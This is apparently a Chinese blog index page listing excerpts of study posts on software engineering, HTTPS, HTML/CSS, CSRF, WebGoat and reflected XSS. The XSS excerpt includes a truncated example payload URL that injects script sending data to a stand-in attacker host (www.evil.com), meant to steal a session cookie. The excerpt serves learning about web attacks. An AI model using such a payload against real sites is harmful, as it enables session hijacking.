snowball_wang的博客

一、课程总结《高级软件工程》是本学期我的专业必选课， 很幸运能够在孟宁老师地指导下学习这门课。在此之前，我对软件工程这个概念的理解只是浮于表面，可以说是并不具备基本的软件工程的思想。在本科的所做的毕业设计中，主要做的工作是如何实现代码的编写，很少从软件工程的角度去看待实现的项目。但是随着学习的深入，发现在实际项目过程中，缺少软件工程的知识和思想会对实际项目开发产生很大影响，于是我决定认真地学习《高级

反射型XSS攻击的原理攻击步骤1.用户正常登陆web应用程序，登陆成功后会得到一个会话信息的cookie Set-Cookie: sessId=xxxxxx2.攻击者将含有攻击代码的URL发送给受害者http://www.example.com?send=<script>document.write(<img height=0 width=0 src="http://www.evil.com

WebGoat: A deliberately insecure Web Application Important InformationThe WebGoat Lesson Server, is currently UNDER MAJOR DEVELOMENT.As of February 1st 2016, the version “7.0.1” is considered th

https部分1.https原理1.客户端（浏览器）的“证书管理器”里有“受信任的根证书颁发机构”，即对应的CA和服务器站点的证书。2.客户端向服务器端发送加密请求（如https://www.baidu.com）。3.服务器收到请求后，需要向客户端验证自己的身份。于是将自己的公钥发送给CA，CA用自己的私钥对服务器的公钥加密，生成数字签名。CA再将服务器的公钥、数字签名和服务器的一些其它消息整

HTML&CSS1.HTMLHTML 表单用于收集不同类型的用户输入。表单是一个包含表单元素的区域，表单元素时允许用户在表单中（比如：文本域、下拉列表、单选框、复选框等等）输入信息的元素。表单使用表单标签<form>定义。HTML负责网页的具体内容（结构），而CSS则修饰网页的表现形式（布局）。2.CSS2.1 CSS基本模型selector {property : value;}selector

CSRF攻击1.攻击原理1.用户登录信任网站A2.验证通过，并在用户浏览器处产生A的Cookie3.用户在没有登录A网站的情形下，访问了黑客网站B4.B网站要求访问第三方站点A，发送一个请求5.根据B在第4步的请求，浏览器带着第2步产生的Cookie访问A6.这步在实际中并没有发生。但其等效于B向A发送请求。由于A并不知情请求的来源，它根据请求中带有的用户的Cookie，处理第5步的请求